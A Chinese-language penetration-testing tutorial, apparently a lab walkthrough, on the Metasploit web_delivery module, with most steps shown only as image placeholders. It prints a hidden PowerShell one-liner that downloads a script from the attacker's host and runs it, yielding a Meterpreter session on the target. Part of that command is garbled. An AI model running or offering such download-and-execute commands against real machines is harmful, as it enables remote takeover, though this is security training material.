metasploit之webdelivery

介绍下webdelivery模块
先是启动metasploit
metasploit之webdelivery_第1张图片
接下来选择我们使用的模块
在这里插入图片描述
Show options看看我们需要设置哪些参数

metasploit之webdelivery_第2张图片metasploit之webdelivery_第3张图片
我们注意到,exploit target出现了python,,莫非还有其他的?我们使用show targets来看看
metasploit之webdelivery_第4张图片
2代表的PSH表示的powershell。我们这次的实验针对的是windows的,考虑到不是所有windows用户都会有python,php的环境,所以不如我们选择powershell吧
所以我们set target 2
在这里插入图片描述
再show options看看还需要设置哪些
metasploit之webdelivery_第5张图片
我们依次设置好就可以了
在这里插入图片描述
接下来执行攻击
metasploit之webdelivery_第6张图片
可以看到我们接收到一串字符串如下:
powershell.exe -nop -w hidden -c M = n e w − o b j e c t n e t . w e b c l i e n t ; M=new-object net.webclient; M=newobjectnet.webclient;M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downloadstring(‘http://192.168.0.104:8080/’);
我们只需要把这串字符串在windows环境下cmd中执行就可以了
在这里插入图片描述
然后回车
这时候回到kali
可以看到
在这里插入图片描述
说明攻击成功了
可以看下会话列表
metasploit之webdelivery_第7张图片
注:此处102是我们的靶机,104是我们的攻击机
我们在上图顺便指定了拿到的会话,这就就来到了meterpreter的交互
metasploit之webdelivery_第8张图片
拿到meterpreter之后可以做什么呢?我们在metasploit后渗透的课程里已经给大家介绍过了,这里就不再重复了~~
扩展资料:https://www.anquanke.com/post/id/86784(与此模块相关的关于劫持无线鼠标的资料,有兴趣的同学可以看看)

你可能感兴趣的:(metasploit之webdelivery)